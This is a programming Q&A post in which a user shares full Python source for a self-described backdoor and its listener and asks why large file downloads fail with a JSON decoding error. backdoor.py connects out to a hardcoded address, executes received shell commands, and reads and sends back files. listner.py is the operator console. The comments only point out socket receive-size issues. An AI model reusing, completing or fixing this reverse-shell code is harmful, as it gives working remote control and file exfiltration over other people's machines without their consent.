# I am making a simple backdoor in python with json and socket but getting a error

Tags: python, json, sockets

in my listner.py file i'm using json to send or receive data when i am downloading a larger file i am getting some error when using download method from this code small file is download but when downloading large file its show error i think this error is cause of json.loads() function which i use in to receive data from backdoor.py

> listner.py

```
import socket, json, base64


class Listner:
    """docstring for Listner"""
    def __init__(self, ip, port):
        try:
            listner = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listner.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listner.bind((ip, port))
            listner.listen(0) 
        except Exception as msg:
            print(str(msg))
            exit(0)

        print("[+] Waiting for incoming connections")
        self.connection, address = listner.accept()
        print("[+] Got a connection from " + str(address))

    def relibale_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def relibale_receive(self):
        json_data = self.connection.recv(4096)
        return json.loads(json_data)    

    def execute_remotely(self, command):
        self.relibale_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.relibale_receive()

    def write_file(self, path, content):
        with open(path, "wb") as file:
            file.write(base64.b64decode(content))
            return "[+] Download successful."   

    def run(self):
        while True:
            command = raw_input(">> ")
            command = command.split(" ")
            result = self.execute_remotely(command)

            if command[0] == "download":
                result = self.write_file(command[1], result)

            print(result)   


my_listner = Listner("192.168.43.239", 4444)
my_listner.run()
```

> backdoor.py

```
#! /usr/bin/env/ python

import socket
import subprocess
import json
import os
import base64

class Backdoor:
    """docstring for Backdoor"""
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def relibale_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def relibale_receive(self):
        json_data = self.connection.recv(1024)
        return json.loads(json_data)    

    def execute_system_command(self, command):
        try:
            return subprocess.check_output(command, shell=True)
        except :
            return "[-] Command Not Found"  

    def change_working_directory_to(self, path):
        try:
            os.chdir(path)
            return "Chaning working directory to " + path       
        except :
            return "[-] Path not found" 

    def read_file(self, path):
        try:
            with open(path, "rb") as file:
                return base64.b64encode(file.read())
        except Exception as msg:
            return "[-] Download Error "    


    def run(self):
        while True:
            command = self.relibale_receive()
            if command[0] == "exit":
                self.connection.close()
                exit()
            elif command[0] == "cd" and len(command) > 1:
                command_result = self.change_working_directory_to(command[1])
            elif command[0] == "download" and len(command) > 1:
                command_result =  self.read_file(command[1])    
            else:       
                command_result = self.execute_system_command(command)

            self.relibale_send(command_result)
        connection.close()  

my_backdoor = Backdoor("192.168.43.239", 4444)
my_backdoor.run()
```

> error is

```
>> dir
 Volume in drive C has no label.
 Volume Serial Number is 1498-641D

 Directory of C:\Users\Vik\Downloads\python_project

06/11/2020  10:05 PM    <DIR>          .
06/11/2020  10:05 PM    <DIR>          ..
06/10/2020  07:04 PM            91,521 gtr.jpg
06/11/2020  10:04 PM             1,594 reverse_backdoor.py
06/11/2020  09:05 PM                50 sa.txt
               3 File(s)         93,165 bytes
               2 Dir(s)  32,916,660,224 bytes free

>> download gtr.jpg
Traceback (most recent call last):
  File "listner.py", line 53, in <module>
    my_listner.run()
  File "listner.py", line 44, in run
    result = self.execute_remotely(command)
  File "listner.py", line 33, in execute_remotely
    return self.relibale_receive()
  File "listner.py", line 26, in relibale_receive
    return json.loads(json_data)    
  File "/usr/lib/python2.7/json/__init__.py", line 339, in loads
    return _default_decoder.decode(s)
  File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/lib/python2.7/json/decoder.py", line 380, in raw_decode
    obj, end = self.scan_once(s, idx)
ValueError: Unterminated string starting at: line 1 column 1 (char 0)
```

Comment: `json_data` is probably not a correct JSON string.

Comment: @MauriceMeyer how can solve it

Comment: `print(json_data)` could be the first step :)

Comment: @MauriceMeyer its printing some encoding data

Comment: @MauriceMeyer when i am print json_data in backdoor.py its print larger number of encoding chars but in lisntner.py its print 1/3 of backdoor.py char

Comment: `json_data = self.connection.recv(4096)`. 1) This obviously can't work for json objects larger than 4096 bytes. 2) This can return fewer bytes than were sent. In either case you get invalid json.

Comment: @MauriceMeyer ok. i changed it to 1024 but still same problem... but when i try to solved it discover that where is the problem. problem in when i sending json in backdoor.py it's not sending all bytes or listner .py maybe its not receiving all bytes

Comment: @PresidentJamesK.Polk then what i need to do